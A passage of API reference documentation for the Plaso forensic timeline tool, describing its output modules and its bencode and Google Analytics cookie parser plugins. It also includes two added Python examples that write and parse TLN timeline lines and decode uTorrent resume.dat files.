        Sets the timeline identifier.
        Parameters: timeline_identifier (int) – timeline identifier.

    WriteHeader()
        Connects to the Elasticsearch server and creates the index.

plaso.output.formatting_helper module

Output module field formatting helper.

class plaso.output.formatting_helper.EventFormattingHelper(output_mediator)
    Bases: object
    Output module event formatting helper.

    abstract GetFormattedEvent(event, event_data, event_data_stream, event_tag)
        Retrieves a string representation of the event.
        Parameters:
            • event (EventObject) – event.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.
            • event_tag (EventTag) – event tag.
        Returns: string representation of the event.
        Return type: str

class plaso.output.formatting_helper.FieldFormattingHelper(output_mediator)
    Bases: object
    Output module field formatting helper.

    GetFormattedField(field_name, event, event_data, event_data_stream, event_tag)
        Formats the specified field.
        Parameters:
            • field_name (str) – name of the field.
            • event (EventObject) – event.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.
            • event_tag (EventTag) – event tag.
        Returns: value of the field.
        Return type: str

plaso.output.interface module

This file contains the output module interface classes.

class plaso.output.interface.OutputModule(output_mediator)
    Bases: object
    Output module interface.

    Close()
        Closes the output.

    DESCRIPTION = ''

    GetMissingArguments()
        Retrieves arguments required by the module that have not been specified.
        Returns: names of arguments that are required by the module and have not been specified.
        Return type: list[str]

    NAME = ''

    Open(**kwargs)
        Opens the output.

    WRITES_OUTPUT_FILE = False

    WriteEvent(event, event_data, event_data_stream, event_tag)
        Writes the event to the output.
        Parameters:
            • event (EventObject) – event.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.
            • event_tag (EventTag) – event tag.

    abstract WriteEventBody(event, event_data, event_data_stream, event_tag)
        Writes event values to the output.
        Parameters:
            • event (EventObject) – event.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.
            • event_tag (EventTag) – event tag.

    WriteEventMACBGroup(event_macb_group)
        Writes an event MACB group to the output.
        An event MACB group is a group of events that have the same timestamp and event data (attributes and values), where the timestamp description (or usage) is one or more of MACB (modification, access, change, birth).
        This function is called if the psort engine detected an event MACB group so that the output module, if supported, can represent the group as such. If not overridden, this function will output every event individually.
        Parameters: event_macb_group (list[tuple[EventObject, EventData, EventDataStream, EventTag]]) – group of events with identical timestamps, attributes and values.

    WriteFooter()
        Writes the footer to the output.
        Can be used for post-processing or output after the last event is written, such as writing a file footer.

    WriteHeader()
        Writes the header to the output.
        Can be used for pre-processing or output before the first event is written, such as writing a file header.

class plaso.output.interface.TextFileOutputModule(output_mediator, event_formatting_helper)
    Bases: plaso.output.interface.OutputModule
    Shared functionality of an output module that writes to a text file.

    Close()
        Closes the output file.

    Open(path=None, **kwargs)
        Opens the output file.
        Parameters: path (Optional[str]) – path of the output file.
        Raises:
            • IOError – if the specified output file already exists.
            • OSError – if the specified output file already exists.
            • ValueError – if path is not set.

    WRITES_OUTPUT_FILE = True

    WriteEventBody(event, event_data, event_data_stream, event_tag)
        Writes event values to the output.
        Parameters:
            • event (EventObject) – event.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.
            • event_tag (EventTag) – event tag.

    WriteLine(text)
        Writes a line of text to the output file.
        Parameters: text (str) – text to output.

    WriteText(text)
        Writes text to the output file.
        Parameters: text (str) – text to output.


plaso.output.json_line module

Output module that saves data into a JSON line format.
JSON line format is a single JSON entry or event per line instead of grouping all the output into a single JSON entity.

class plaso.output.json_line.JSONLineOutputModule(output_mediator)
    Bases: plaso.output.interface.TextFileOutputModule
    Output module for the JSON line format.

    DESCRIPTION = 'Saves the events into a JSON line format.'

    NAME = 'json_line'

    WriteEventBody(event, event_data, event_data_stream, event_tag)
        Writes event values to the output.
        Parameters:
            • event (EventObject) – event.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.
            • event_tag (EventTag) – event tag.

plaso.output.json_out module

Output module that saves data into a JSON format.

class plaso.output.json_out.JSONOutputModule(output_mediator)
    Bases: plaso.output.interface.TextFileOutputModule
    Output module for the JSON format.

    DESCRIPTION = 'Saves the events into a JSON format.'

    NAME = ''

    WriteEventBody(event, event_data, event_data_stream, event_tag)
        Writes event values to the output.
        Parameters:
            • event (EventObject) – event.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.
            • event_tag (EventTag) – event tag.

    WriteFooter()
        Writes the footer to the output.

    WriteHeader()
        Writes the header to the output.


plaso.output.kml module

An output module that writes events with geography data to a KML XML file.
The Keyhole Markup Language (KML) is an XML notation for expressing geographic annotation and visualization within Internet-based, two-dimensional maps and three-dimensional Earth browsers.

class plaso.output.kml.KMLOutputModule(output_mediator)
    Bases: plaso.output.interface.TextFileOutputModule
    Output module for a Keyhole Markup Language (KML) XML file.

    DESCRIPTION = 'Saves events with geography data into a KML format.'

    NAME = 'kml'

    WriteEventBody(event, event_data, event_data_stream, event_tag)
        Writes event values to the output.
        Parameters:
            • event (EventObject) – event.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.
            • event_tag (EventTag) – event tag.

    WriteFooter()
        Writes the footer to the output.

    WriteHeader()
        Writes the header to the output.

plaso.output.l2t_csv module

Output module for the log2timeline (L2T) CSV format.
For documentation on the L2T CSV format see: https://forensicswiki.xyz/wiki/index.php?title=L2T_CSV

class plaso.output.l2t_csv.L2TCSVEventFormattingHelper(output_mediator, field_formatting_helper, field_names, field_delimiter=',')
    Bases: plaso.output.shared_dsv.DSVEventFormattingHelper
    L2T CSV output module event formatting helper.

    GetFormattedEventMACBGroup(event_macb_group)
        Retrieves a string representation of the event.
        Parameters: event_macb_group (list[tuple[EventObject, EventData, EventDataStream, EventTag]]) – group of events with identical timestamps, attributes and values.
        Returns: string representation of the event MACB group.


        Return type: str

class plaso.output.l2t_csv.L2TCSVFieldFormattingHelper(output_mediator)
    Bases: plaso.output.formatting_helper.FieldFormattingHelper
    L2T CSV output module field formatting helper.

class plaso.output.l2t_csv.L2TCSVOutputModule(output_mediator)
    Bases: plaso.output.interface.TextFileOutputModule
    CSV format used by log2timeline, with 17 fixed fields.

    DESCRIPTION = 'CSV format used by legacy log2timeline, with 17 fixed fields.'

    NAME = 'l2tcsv'

    WriteEventMACBGroup(event_macb_group)
        Writes an event MACB group to the output.
        Parameters: event_macb_group (list[tuple[EventObject, EventData, EventDataStream, EventTag]]) – group of events with identical timestamps, attributes and values.

    WriteHeader()
        Writes the header to the output.

plaso.output.logger module

The output sub module logger.

plaso.output.manager module

Output plugin manager.

class plaso.output.manager.OutputManager
    Bases: object
    Output module manager.

    classmethod DeregisterOutput(output_class)
        Deregisters an output class.
        The output classes are identified based on their NAME attribute.
        Parameters: output_class (type) – output module class.
        Raises: KeyError – if the output class is not set for the corresponding name.

    classmethod GetDisabledOutputClasses()
        Retrieves the disabled output classes and their associated names.
        Yields: tuple[str, type] – output module name and class.


classmethod GetOutputClass(name) Retrieves the output class for a specific name.
Parameters name (str) – name of the output module.
Returns output module class. Return type type
Raises
• KeyError – if there is no output class found with the supplied name.
• ValueError – if name is not a string.
classmethod GetOutputClasses() Retrieves the available output classes and their associated names.
Yields tuple[str, type] – output class name and type object.
classmethod HasOutputClass(name) Determines if a specific output class is registered with the manager.
Parameters name (str) – name of the output module.
Returns True if the output class is registered. Return type bool
classmethod NewOutputModule(name, output_mediator) Creates a new output module object for the specified output format.
Parameters
• name (str) – name of the output module.
• output_mediator (OutputMediator) – output mediator.
Returns output module. Return type OutputModule
Raises
• KeyError – if there is no output class found with the supplied name.
• ValueError – if name is not a string.
classmethod RegisterOutput(output_class, disabled=False) Registers an output class. The output classes are identified based on their NAME attribute.
Parameters
• output_class (type) – output module class.
• disabled (Optional[bool]) – True if the output module is disabled, for example because the module did not load correctly.
Raises KeyError – if an output class is already set for the corresponding name.
classmethod RegisterOutputs(output_classes, disabled=False) Registers output classes. The output classes are identified based on their NAME attribute.
Parameters


• output_classes (list[type]) – output module classes.
• disabled (Optional[bool]) – True if the output modules are disabled, for example because a module did not load correctly.
Raises KeyError – if an output class is already set for the corresponding name.

plaso.output.mediator module

The output mediator object.

class plaso.output.mediator.OutputMediator(knowledge_base, data_location=None, dynamic_time=False, preferred_encoding='utf-8')
Bases: object
Output mediator.
data_location path of the formatter data files. Type Optional[str]
DEFAULT_LANGUAGE_IDENTIFIER = 'en-US'
DEFAULT_LCID = 1033
GetDisplayNameForPathSpec(path_spec) Retrieves the display name for a path specification.
Parameters path_spec (dfvfs.PathSpec) – path specification.
Returns human readable version of the path specification. Return type str
GetHostname(event_data, default_hostname='-') Retrieves the hostname related to the event.
Parameters
• event_data (EventData) – event data.
• default_hostname (Optional[str]) – default hostname.
Returns hostname. Return type str
GetMACBRepresentation(event, event_data) Retrieves the MACB representation.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
Returns MACB representation. Return type str
GetMACBRepresentationFromDescriptions(timestamp_descriptions) Determines the MACB representation from the timestamp descriptions. The MACB representation is a shorthand that renders the modification, access, change and birth timestamp descriptions as the letters “MACB”, with a “.” in place of any letter whose corresponding timestamp is not set.


Note that this is an output format shorthand and does not guarantee that the timestamps represent the same occurrence.
Parameters timestamp_descriptions (list[str]) – timestamp descriptions, which are defined in definitions.TIME_DESCRIPTIONS.
Returns MACB representation. Return type str
GetMessageFormatter(data_type) Retrieves the message formatter for a specific data type.
Parameters data_type (str) – data type.
Returns corresponding message formatter or the default message formatter if not available. Return type EventFormatter
GetRelativePathForPathSpec(path_spec) Retrieves the relative path for a path specification.
Parameters path_spec (dfvfs.PathSpec) – path specification.
Returns relative path of the path specification. Return type str
GetStoredHostname() Retrieves the stored hostname.
Returns hostname. Return type str
GetUsername(event_data, default_username='-') Retrieves the username related to the event.
Parameters
• event_data (EventData) – event data.
• default_username (Optional[str]) – default username.
Returns username. Return type str
GetWindowsEventMessage(log_source, message_identifier) Retrieves the message string for a specific Windows Event Log source.
Parameters
• log_source (str) – Event Log source, such as “Application Error”.
• message_identifier (int) – message identifier.
Returns message string or None if not available. Return type str
ReadMessageFormattersFromDirectory(path) Reads message formatters from a directory.
Parameters path (str) – path of the directory that contains the message formatters configuration files.


Raises KeyError – if the message formatter is already set for the corresponding data type.
ReadMessageFormattersFromFile(path) Reads message formatters from a file.
Parameters path (str) – path of the file that contains the message formatters configuration.
Raises KeyError – if the message formatter is already set for the corresponding data type.
SetPreferredLanguageIdentifier(language_identifier) Sets the preferred language identifier.
Parameters language_identifier (str) – language identifier string such as “en-US” for US English or “is-IS” for Icelandic.
Raises
• KeyError – if the language identifier is not defined.
• ValueError – if the language identifier is not a string type.
SetTimezone(timezone) Sets the timezone.
Parameters timezone (str) – timezone.
Raises ValueError – if the timezone is not supported.
property dynamic_time True if date and time values should be represented in their granularity or semantically. Type bool
property encoding preferred encoding. Type str
property timezone The timezone.

plaso.output.null module

Null device output module.

class plaso.output.null.NullOutputModule(output_mediator)
Bases: plaso.output.interface.OutputModule
Null device output module.
DESCRIPTION = 'Output module that does not output anything.'
NAME = 'null'
WriteEventBody(event, event_data, event_data_stream, event_tag) Writes event values to the output.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.

plaso.output.rawpy module

Output module for the native (or “raw”) Python format.

class plaso.output.rawpy.NativePythonEventFormattingHelper(output_mediator)
Bases: plaso.output.formatting_helper.EventFormattingHelper
Native (or “raw”) Python output module event formatting helper.
GetFormattedEvent(event, event_data, event_data_stream, event_tag) Retrieves a string representation of the event.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
Returns string representation of the event. Return type str

class plaso.output.rawpy.NativePythonOutputModule(output_mediator)
Bases: plaso.output.interface.TextFileOutputModule
Output module for the native (or “raw”) Python output format.
DESCRIPTION = 'native (or "raw") Python output.'
NAME = 'rawpy'

plaso.output.shared_dsv module

Shared functionality for delimiter separated values output modules.

class plaso.output.shared_dsv.DSVEventFormattingHelper(output_mediator, field_formatting_helper, field_names, field_delimiter=',')
Bases: plaso.output.formatting_helper.EventFormattingHelper
Delimiter separated values output module event formatting helper.
GetFormattedEvent(event, event_data, event_data_stream, event_tag) Retrieves a string representation of the event.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
Returns string representation of the event. Return type str
GetFormattedFieldNames() Retrieves a string representation of the field names.
Returns string representation of the field names.


Return type str
SetFieldDelimiter(field_delimiter) Sets the field delimiter.
Parameters field_delimiter (str) – field delimiter.
SetFields(field_names) Sets the names of the fields to output.
Parameters field_names (list[str]) – names of the fields to output.

class plaso.output.shared_dsv.DSVOutputModule(output_mediator, field_formatting_helper, names, delimiter=',', header=None)
Bases: plaso.output.interface.TextFileOutputModule
Shared functionality for delimiter separated values output modules.
SetFieldDelimiter(field_delimiter) Sets the field delimiter.
Parameters field_delimiter (str) – field delimiter.
SetFields(field_names) Sets the names of the fields to output.
Parameters field_names (list[str]) – names of the fields to output.
WriteHeader() Writes the header to the output.

plaso.output.shared_elastic module

Shared functionality for Elasticsearch output modules.

class plaso.output.shared_elastic.SharedElasticsearchFieldFormattingHelper(output_mediator)
Bases: plaso.output.formatting_helper.FieldFormattingHelper
Shared Elasticsearch output module field formatting helper.
GetFormattedField(field_name, event, event_data, event_data_stream, event_tag) Formats the specified field.
Parameters
• field_name (str) – name of the field.
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
Returns value of the field or None if not set. Return type object

class plaso.output.shared_elastic.SharedElasticsearchOutputModule(output_mediator)
Bases: plaso.output.interface.OutputModule
Shared functionality for an Elasticsearch output module.


Close() Closes the connection to Elasticsearch. Inserts any remaining buffered event documents.
NAME = 'elastic_shared'
SetCACertificatesPath(ca_certificates_path) Sets the path to the CA certificates.
Parameters ca_certificates_path (str) – path to a file containing the root certificates to trust.
Raises BadConfigOption – if the CA certificates file does not exist.
SetFields(field_names) Sets the names of the fields to output.
Parameters field_names (list[str]) – names of the fields to output.
SetFlushInterval(flush_interval) Sets the flush interval.
Parameters flush_interval (int) – number of events to buffer before doing a bulk insert.
SetIndexName(index_name) Sets the index name.
Parameters index_name (str) – name of the index.
SetMappings(mappings) Sets the mappings.
Parameters mappings (dict[str, object]) – mappings of the index.
SetPassword(password) Sets the password.
Parameters password (str) – password to authenticate with.
SetServerInformation(server, port) Sets the server information.
Parameters
• server (str) – IP address or hostname of the server.
• port (int) – port number of the server.
SetURLPrefix(url_prefix) Sets the URL prefix.
Parameters url_prefix (str) – URL prefix.
SetUseSSL(use_ssl) Sets the use of SSL/TLS. Use together with SetCACertificatesPath so that the server certificate is checked against an explicitly trusted root rather than whatever the client environment happens to trust.
Parameters use_ssl (bool) – enforces use of SSL/TLS for the connection to the server.
SetUsername(username) Sets the username.
Parameters username (str) – username to authenticate with.
WriteEventBody(event, event_data, event_data_stream, event_tag) Writes event values to the output.


Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.

plaso.output.shared_json module

Shared functionality for JSON based output modules.

class plaso.output.shared_json.JSONEventFormattingHelper(output_mediator)
Bases: plaso.output.formatting_helper.EventFormattingHelper
JSON output module event formatting helper.
GetFormattedEvent(event, event_data, event_data_stream, event_tag) Retrieves a string representation of the event.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
Returns string representation of the event. Return type str

plaso.output.tln module

Output module for the TLN format. For documentation on the TLN format see: https://forensicswiki.xyz/wiki/index.php?title=TLN

class plaso.output.tln.L2TTLNOutputModule(output_mediator)
Bases: plaso.output.shared_dsv.DSVOutputModule
Output module for the log2timeline extended variant of the TLN format. l2tTLN is an extended variant of TLN introduced in log2timeline.pl 0.65. l2tTLN extends basic TLN to 7 |-separated fields, namely:
* Time - 32-bit POSIX (or Unix) epoch timestamp.
* Source - The name of the parser or plugin that produced the event.
* Host - The source host system.
* User - The user associated with the data.
* Description - Message string describing the data.
* TZ - L2T 0.65 field. Timezone of the event.
* Notes - L2T 0.65 field. Optional notes field or filename and inode.
DESCRIPTION = 'Extended TLN 7 field | delimited output.'
NAME = 'l2ttln'

class plaso.output.tln.TLNFieldFormattingHelper(output_mediator)
Bases: plaso.output.formatting_helper.FieldFormattingHelper
TLN output module field formatting helper.
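An added example, not Plaso code, that writes and reads back the TLN (5 field) and l2tTLN (7 field) layouts described above from constructed sample events. It enforces the 32-bit POSIX range the Time field is defined with and neutralises a '|' inside a field value before emitting it, because an unescaped delimiter shifts every following column for whoever consumes the file. The replacement rule (delimiter and newline become a space, empty values become '-') and the sample events are this example's assumptions, not rules taken from Plaso.

```python
# Added example, not Plaso code: emit and parse TLN / l2tTLN lines.
import datetime

TLN_FIELDS = ('time', 'source', 'host', 'user', 'description')
L2TTLN_FIELDS = TLN_FIELDS + ('tz', 'notes')
MAX_POSIX_32 = 2 ** 31 - 1  # the format defines Time as a 32-bit POSIX timestamp


def _clean(value):
    """Neutralise characters that would break a '|' delimited, line based format.

    Assumption of this example: an embedded '|' or line break becomes a space
    and a missing value is written as '-'.
    """
    if value is None or value == '':
        return '-'
    return str(value).replace('|', ' ').replace('\r', ' ').replace('\n', ' ')


def format_tln_line(event, extended=False):
    """Render one event as a TLN (5 field) or l2tTLN (7 field) line."""
    timestamp = int(event['time'])
    if not 0 <= timestamp <= MAX_POSIX_32:
        raise ValueError('timestamp %d does not fit a 32-bit POSIX field' % timestamp)
    names = L2TTLN_FIELDS if extended else TLN_FIELDS
    return '|'.join([str(timestamp)] + [_clean(event.get(name)) for name in names[1:]])


def render_tln(events, extended=False):
    """Return the complete output text, one event per line."""
    return '\n'.join(format_tln_line(event, extended) for event in events) + '\n'


def parse_tln_line(line):
    """Parse a line back into a dict; the field count decides which variant it is."""
    parts = line.rstrip('\r\n').split('|')
    if len(parts) == len(TLN_FIELDS):
        names = TLN_FIELDS
    elif len(parts) == len(L2TTLN_FIELDS):
        names = L2TTLN_FIELDS
    else:
        raise ValueError('expected 5 or 7 fields, got %d: %r' % (len(parts), line))
    record = dict(zip(names, parts))
    record['time'] = int(record['time'])
    record['datetime'] = datetime.datetime.fromtimestamp(
        record['time'], datetime.timezone.utc)
    return record


# Constructed sample events; the first description deliberately carries a '|'.
SAMPLE_EVENTS = [
    {'time': 1383170166, 'source': 'FILE', 'host': 'ws01', 'user': 'alice',
     'description': 'Content Modification Time /home/alice/notes|draft.txt',
     'tz': 'UTC', 'notes': 'inode 1234'},
    {'time': 1383170170, 'source': 'LOG', 'host': 'ws01', 'user': None,
     'description': 'sshd accepted publickey for alice', 'tz': 'UTC', 'notes': None},
]

if __name__ == '__main__':
    print(render_tln(SAMPLE_EVENTS, extended=True))
```

The range check matters for timelines that include far-future or pre-1970 values (bogus filesystem timestamps are common in evidence): a 32-bit field cannot represent them, so the writer refuses rather than silently wrapping.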

class plaso.output.tln.TLNOutputModule(output_mediator)
Bases: plaso.output.shared_dsv.DSVOutputModule
Output module for the TLN format. TLN defines 5 |-separated fields, namely:
* Time - 32-bit POSIX (or Unix) epoch timestamp.
* Source - The name of the parser or plugin that produced the event.
* Host - The source host system.
* User - The user associated with the data.
* Description - Message string describing the data.
DESCRIPTION = 'TLN 5 field | delimited output.'
NAME = 'tln'

plaso.output.xlsx module

Output module for the Excel Spreadsheet (XLSX) output format.

class plaso.output.xlsx.XLSXOutputModule(output_mediator)
Bases: plaso.output.interface.OutputModule
Output module for the Excel Spreadsheet (XLSX) output format.
Close() Closes the workbook.
DESCRIPTION = 'Excel Spreadsheet (XLSX) output'
NAME = 'xlsx'
Open(path=None, **kwargs) Creates a new workbook.
Parameters path (Optional[str]) – path of the output file.
Raises
• IOError – if the specified output file already exists.
• OSError – if the specified output file already exists.
• ValueError – if path is not set.
SetFields(fields) Sets the fields to output.
Parameters fields (list[str]) – names of the fields to output.
SetTimestampFormat(timestamp_format) Sets the timestamp format to use for the datetime column.
Parameters timestamp_format (str) – format string of date and time values.
WRITES_OUTPUT_FILE = True
WriteEventBody(event, event_data, event_data_stream, event_tag) Writes event values to the output.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.


WriteHeader() Writes the header to the spreadsheet.

Module contents

This file imports Python modules that register output modules.

5.1.11 plaso.parsers package

Subpackages plaso.parsers.bencode_plugins package

Submodules plaso.parsers.bencode_plugins.interface module

Bencode parser plugin interface.

class plaso.parsers.bencode_plugins.interface.BencodePlugin
Bases: plaso.parsers.plugins.BasePlugin
Bencode parser plugin interface.
CheckRequiredKeys(bencode_file) Checks if the bencode file has the minimal keys required by the plugin.
Parameters bencode_file (BencodeFile) – bencode file.
Returns True if the bencode file has the minimum keys defined by the plugin, or False if it does not or no required keys are defined. The bencode file can have more keys than specified by the plugin and still return True. Return type bool
DATA_FORMAT = 'Bencoded file'
NAME = 'bencode_plugin'
abstract Process(parser_mediator, bencode_file=None, **kwargs) Extracts events from a bencode file. This is the main method that a Bencode plugin needs to implement. The contents of the bencode keys defined in _BENCODE_KEYS can be made available to the plugin both as a matched {'KEY': 'value'} dictionary and as the entire bencoded data dictionary.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• bencode_file (Optional[BencodeFile]) – bencode file.


plaso.parsers.bencode_plugins.transmission module

Bencode parser plugin for Transmission BitTorrent files.

class plaso.parsers.bencode_plugins.transmission.TransmissionBencodePlugin
Bases: plaso.parsers.bencode_plugins.interface.BencodePlugin
Parses the Transmission BitTorrent activity file for current torrents. Transmission stores an individual bencoded file for each active download in a folder named resume under the user’s application data folder.
DATA_FORMAT = 'Transmission BitTorrent activity file'
NAME = 'bencode_transmission'
Process(parser_mediator, bencode_file=None, **kwargs) Extracts events from a file in Transmission’s resume folder.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• bencode_file (Optional[BencodeFile]) – bencode file.

class plaso.parsers.bencode_plugins.transmission.TransmissionEventData
Bases: plaso.containers.events.EventData
Transmission BitTorrent event data.
destination path of the downloaded file. Type str
seedtime client seed time in number of minutes. Type int
DATA_TYPE = 'p2p:bittorrent:transmission'

plaso.parsers.bencode_plugins.utorrent module

Bencode parser plugin for uTorrent active torrent files.

class plaso.parsers.bencode_plugins.utorrent.UTorrentBencodePlugin
Bases: plaso.parsers.bencode_plugins.interface.BencodePlugin
Plugin to parse uTorrent active torrent files. uTorrent creates a file, resume.dat, and a backup, resume.dat.old, for all active torrents. This is typically stored in the user’s application data folder. These files, at a minimum, contain a ‘.fileguard’ key and a dictionary with a key name for a particular download with a ‘.torrent’ file extension.
DATA_FORMAT = 'uTorrent active torrent file'
NAME = 'bencode_utorrent'
Process(parser_mediator, bencode_file=None, **kwargs) Extracts events from a uTorrent active torrent file.


Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• bencode_file (Optional[BencodeFile]) – bencode file.

class plaso.parsers.bencode_plugins.utorrent.UTorrentEventData
Bases: plaso.containers.events.EventData
uTorrent active torrent event data.
caption official name of package. Type str
destination path of the downloaded file. Type str
seedtime client seed time in number of minutes. Type int
DATA_TYPE = 'p2p:bittorrent:utorrent'
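An added example, not Plaso code, covering the two bencode plugins above: a small bencode codec, the CheckRequiredKeys rule (every required key present, extra keys allowed, False when nothing is required), and the uTorrent resume.dat structure check, which demands a '.fileguard' key and then picks out the per-download dictionaries whose key ends in '.torrent'. The same decoder applies to the per-download files in Transmission's resume folder. The resume.dat bytes are constructed here; a real file carries many more keys, and the 'caption', 'path' and 'seedtime' names inside the per-torrent dictionary are this example's assumptions.

```python
# Added example, not Plaso code: bencode codec plus the resume.dat checks.


def bencode(obj):
    """Encode str/bytes/int/list/dict as bencode (dict keys sorted, per spec)."""
    if isinstance(obj, bool):
        raise TypeError('bencode has no boolean type')
    if isinstance(obj, int):
        return b'i%de' % obj
    if isinstance(obj, str):
        obj = obj.encode('utf-8')
    if isinstance(obj, bytes):
        return b'%d:%s' % (len(obj), obj)
    if isinstance(obj, list):
        return b'l' + b''.join(bencode(item) for item in obj) + b'e'
    if isinstance(obj, dict):
        return b'd' + b''.join(
            bencode(key) + bencode(value) for key, value in sorted(obj.items())) + b'e'
    raise TypeError('cannot bencode %r' % type(obj))


def bdecode(data):
    """Decode one bencoded value; dict keys become str, byte strings stay bytes."""
    value, end = _decode(data, 0)
    if end != len(data):
        raise ValueError('trailing data after bencoded value')
    return value


def _decode(data, pos):
    lead = data[pos:pos + 1]
    if lead == b'i':
        end = data.index(b'e', pos)  # ValueError on truncated input
        return int(data[pos + 1:end]), end + 1
    if lead == b'l':
        items, pos = [], pos + 1
        while data[pos:pos + 1] != b'e':
            item, pos = _decode(data, pos)
            items.append(item)
        return items, pos + 1
    if lead == b'd':
        result, pos = {}, pos + 1
        while data[pos:pos + 1] != b'e':
            key, pos = _decode(data, pos)
            if not isinstance(key, bytes):
                raise ValueError('dictionary key is not a byte string')
            value, pos = _decode(data, pos)
            result[key.decode('utf-8', 'replace')] = value
        return result, pos + 1
    if lead.isdigit():
        colon = data.index(b':', pos)
        length = int(data[pos:colon])
        start = colon + 1
        if start + length > len(data):
            raise ValueError('byte string runs past end of input')
        return data[start:start + length], start + length
    raise ValueError('invalid bencode at offset %d' % pos)


def check_required_keys(decoded, required_keys):
    """CheckRequiredKeys rule: all required keys present, extras allowed,
    False when no required keys are defined."""
    return bool(required_keys) and set(required_keys).issubset(decoded)


def utorrent_torrents(resume):
    """Return the per-download dictionaries of a decoded resume.dat."""
    if not check_required_keys(resume, {'.fileguard'}):
        raise ValueError("not a uTorrent resume.dat: '.fileguard' key missing")
    return {name: entry for name, entry in resume.items()
            if name.endswith('.torrent') and isinstance(entry, dict)}


# Constructed sample resume.dat; the inner key names are assumptions.
SAMPLE_RESUME_DAT = bencode({
    '.fileguard': '0' * 40,
    'demo.torrent': {'caption': 'demo', 'path': 'C:\\dl\\demo.iso', 'seedtime': 120},
    'rec': {'not': 'a torrent'},
})

if __name__ == '__main__':
    for name, entry in utorrent_torrents(bdecode(SAMPLE_RESUME_DAT)).items():
        print(name, entry['path'].decode('utf-8', 'replace'), entry['seedtime'])
```

The decoder fails closed on truncated or malformed input (a byte-string length that runs past the buffer, a missing terminator) instead of returning a partial structure, which is the behaviour you want when the file comes from evidence rather than from a trusted client.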

Module contents

Imports for the bencode parser. plaso.parsers.cookie_plugins package

Submodules plaso.parsers.cookie_plugins.ganalytics module

This file contains a plugin for parsing Google Analytics cookies.

class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventData(cookie_identifier)
Bases: plaso.containers.events.EventData
Google Analytics event data.
cookie_name name of cookie. Type str
domain_hash domain hash. Type str
pages_viewed number of pages viewed. Type int


sessions number of sessions. Type int
sources number of sources. Type int
url URL or path where the cookie got set. Type str
visitor_id visitor identifier. Type str
DATA_TYPE = 'cookie:google:analytics'

class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmaPlugin
Bases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin
A browser cookie plugin for __utma Google Analytics cookies. The cookie data consists of six dot-separated fields. For example:
137167072.1215918423.1383170166.1383170166.1383170166.1
Or a single value. For example:
13113225820000000
COOKIE_NAME = '__utma'
DATA_FORMAT = 'Google Analytics __utma cookie'
NAME = 'google_analytics_utma'

class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmbPlugin
Bases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin
A browser cookie plugin for __utmb Google Analytics cookies. The cookie data consists of four dot-separated fields. For example:
137167072.1.10.1383170166
173272373.6.8.1440489514899
173272373.4.9.1373300660574
Or a single value. For example:
13113225820000000
COOKIE_NAME = '__utmb'
DATA_FORMAT = 'Google Analytics __utmb cookie'
NAME = 'google_analytics_utmb'

class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmtPlugin
Bases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin
A browser cookie plugin for __utmt Google Analytics cookies. The cookie data is a single value. For example:
13113215173000000


COOKIE_NAME = '__utmt'
DATA_FORMAT = 'Google Analytics __utmt cookie'
NAME = 'google_analytics_utmt'

class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmzPlugin
Bases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin
A browser cookie plugin for __utmz Google Analytics cookies. The cookie data consists of four dot-separated fields followed by a fifth field of |-separated key=value pairs. For example:
207318870.1383170190.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)
Or a single value. For example:
13128990382000000
COOKIE_NAME = '__utmz'
DATA_FORMAT = 'Google Analytics __utmz cookie'
NAME = 'google_analytics_utmz'

plaso.parsers.cookie_plugins.interface module

This file contains an interface for browser cookie plugins.

class plaso.parsers.cookie_plugins.interface.BaseCookiePlugin
Bases: plaso.parsers.plugins.BasePlugin
A browser cookie plugin for Plaso. This is a generic cookie parsing interface that can handle parsing cookies from all browsers.
COOKIE_NAME = ''
DATA_FORMAT = 'Browser cookie data'
NAME = 'cookie_plugin'
Process(parser_mediator, cookie_name, cookie_data, url, **kwargs) Extracts events from cookie data.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• cookie_name (str) – the name of the cookie value.
• cookie_data (bytes) – the cookie data, as a byte sequence.
• url (str) – the full URL or path where the cookie was set.
Raises
• errors.WrongPlugin – if the cookie name differs from the one supplied in COOKIE_NAME.
• ValueError – if cookie_name or cookie_data are not set.
